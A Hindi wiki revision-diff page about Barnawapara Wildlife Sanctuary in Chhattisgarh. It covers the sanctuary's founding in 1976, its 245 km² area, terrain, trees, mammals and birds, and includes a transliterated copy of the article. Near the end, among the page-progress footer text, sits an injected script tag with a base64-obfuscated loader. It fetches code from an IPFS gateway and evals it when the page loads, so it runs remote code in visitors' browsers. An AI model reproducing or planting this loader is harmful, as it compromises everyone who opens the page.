Difference between revisions of "बारनावापारा वन्य जीवन अभयारण्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*बारनावापारा वन्‍य जीवन अभयारण्‍य इस क्षेत्र का एक ...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
*बारनावापारा वन्‍य जीवन अभयारण्‍य इस क्षेत्र का एक उत्‍कृष्‍ट और महत्‍वपूर्ण वन्‍य जीवन अभयारण्‍य है।  
+
*बारनावापारा वन्‍य जीवन अभयारण्‍य [[छत्तीसगढ़]] का एक उत्‍कृष्‍ट और महत्‍वपूर्ण वन्‍य जीवन अभयारण्‍य है।  
 
*बारनावापारा की स्‍थापना 1976 में वन्‍य जीवन संरक्षण अधिनियम, 1972 के तहत की गई थी और यह अभयारण्‍य अपेक्षाकृत छोटा है जो केवल 245 वर्ग किलोमीटर के क्षेत्र में फैला है।  
 
*बारनावापारा की स्‍थापना 1976 में वन्‍य जीवन संरक्षण अधिनियम, 1972 के तहत की गई थी और यह अभयारण्‍य अपेक्षाकृत छोटा है जो केवल 245 वर्ग किलोमीटर के क्षेत्र में फैला है।  
*इस क्षेत्र की स्‍थलाकृति चपटी है और यहाँ 265-400 मीटर के बीच ऊँचाई वाली पहाड़ी तराइयाँ स्थित हैं।  
+
*बारनावापारा वन्‍य जीवन अभयारण्‍य की क्षेत्र की स्‍थलाकृति चपटी है और यहाँ 265-400 मीटर के बीच ऊँचाई वाली पहाड़ी तराइयाँ स्थित हैं।  
 
*बारनावापारा वन्‍य जीवन अभयारण्‍य अपनी हरी भरी वनस्‍पति और अनोखे वन्‍य जीवन के कारण जाना जाता है।
 
*बारनावापारा वन्‍य जीवन अभयारण्‍य अपनी हरी भरी वनस्‍पति और अनोखे वन्‍य जीवन के कारण जाना जाता है।
 
*बारनावापारा वन्‍य जीवन अभयारण्‍य में मुख्‍य रूप से उष्‍णकटिबंधी सूखे पतझड़ी वन है जिसमें टीक, साल, [[बांस]] और तर्मीनेलिया के पेड़ प्रमुख हैं।  
 
*बारनावापारा वन्‍य जीवन अभयारण्‍य में मुख्‍य रूप से उष्‍णकटिबंधी सूखे पतझड़ी वन है जिसमें टीक, साल, [[बांस]] और तर्मीनेलिया के पेड़ प्रमुख हैं।  
 
*बारनावापारा अभयारण्‍य में पाए जाने वाले अन्‍य प्रमुख वृक्षों में सेमल, महुआ, बेर और तेंदु शामिल हैं।  
 
*बारनावापारा अभयारण्‍य में पाए जाने वाले अन्‍य प्रमुख वृक्षों में सेमल, महुआ, बेर और तेंदु शामिल हैं।  
*बारनावापारा वन्‍य जीवन अभयारण्‍य में पाए जाने वाले प्रमुख वन्‍य जंतु हैं [[बाघ]], स्‍लॉथ बीयर, उड़ने वाली गिलहरी, [[भेडिया|भेडिए]], चार सींग वाले एंटीलॉप, चीते, चिंकारा, ब्‍लैक बक, जंगली बिल्‍ली, बार्किंग डीयर, साही, [[बंदर]], बायसन, पट्टी दार हाइना, जंगली कुत्ते, चीतल, सांभर, नील गाय, गौर, मुंट जेक, जंगली सुअर, कोबरा और [[अजगर]] आदि कुछ प्रमुख हैं।  
+
*बारनावापारा वन्‍य जीवन अभयारण्‍य में पाए जाने वाले प्रमुख वन्‍य जंतु हैं [[बाघ]], स्‍लॉथ बीयर, उड़ने वाली गिलहरी, [[भेडिया|भेडिए]], चार सींग वाले एंटीलॉप, चीते, चिंकारा, ब्‍लैक बक, जंगली बिल्‍ली, बार्किंग डीयर, साही, [[बंदर]], बायसन, पट्टी दार हाइना, जंगली कुत्ते, [[चीतल]], सांभर, नील गाय, गौर, मुंट जेक, जंगली सुअर, कोबरा और [[अजगर]] आदि कुछ प्रमुख हैं।  
*इस अभयारण्‍य में बड़ी संख्‍या में पक्षी पाए जाते हें जिनमें से प्रमुख [[तोता|तोते]], बुलबुल, सफेद रम्‍पयुक्‍त गिद्ध, हरे आवादावात, लेसर केस्‍ट्रेल, पी फाउल, कठफोड़वा, रेकिट टेल वाले ड्रोंगो, अगरेट, हेरॉन्‍स आदि हैं।  
+
*बारनावापारा वन्‍य जीवन अभयारण्‍य में बड़ी संख्‍या में पक्षी पाए जाते हें जिनमें से प्रमुख [[तोता|तोते]], बुलबुल, सफेद रम्‍पयुक्‍त गिद्ध, हरे आवादावात, लेसर केस्‍ट्रेल, पी फाउल, कठफोड़वा, रेकिट टेल वाले ड्रोंगो, अगरेट, हेरॉन्‍स आदि हैं।  
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 05:18, 18 August 2011

  • baranavapara vanh‍y jivan abhayaranh‍y chhattisagadh ka ek uth‍krishh‍t aur mahath‍vapoorn vanh‍y jivan abhayaranh‍y hai.
  • baranavapara ki sh‍thapana 1976 mean vanh‍y jivan sanrakshan adhiniyam, 1972 ke tahat ki gee thi aur yah abhayaranh‍y apekshakrit chhota hai jo keval 245 varg kilomitar ke kshetr mean phaila hai.
  • baranavapara vanh‍y jivan abhayaranh‍y ki kshetr ki sh‍thalakriti chapati hai aur yahaan 265-400 mitar ke bich ooanchaee vali paha di taraiyaan sthit haian.
  • baranavapara vanh‍y jivan abhayaranh‍y apani hari bhari vanash‍pati aur anokhe vanh‍y jivan ke karan jana jata hai.
  • baranavapara vanh‍y jivan abhayaranh‍y mean mukhh‍y roop se ushh‍nakatibandhi sookhe patajh di van hai jisamean tik, sal, baans aur tarmineliya ke pe d pramukh haian.
  • baranavapara abhayaranh‍y mean pae jane vale anh‍y pramukh vrikshoan mean semal, mahua, ber aur teandu shamil haian.
  • baranavapara vanh‍y jivan abhayaranh‍y mean pae jane vale pramukh vanh‍y jantu haian bagh, sh‍l aauth biyar, u dane vali gilahari, bhedie, char siang vale eantil aaup, chite, chiankara, bh‍laik bak, jangali bilh‍li, barkiang diyar, sahi, bandar, bayasan, patti dar haina, jangali kutte, chital, saanbhar, nil gay, gaur, muant jek, jangali suar, kobara aur ajagar adi kuchh pramukh haian.
  • baranavapara vanh‍y jivan abhayaranh‍y mean b di sankhh‍ya mean pakshi pae jate hean jinamean se pramukh tote, bulabul, saphed ramh‍payukh‍t giddh, hare avadavat, lesar kesh‍trel, pi phaul, kathapho dava, rekit tel vale droango, agaret, her aaunh‍s adi haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh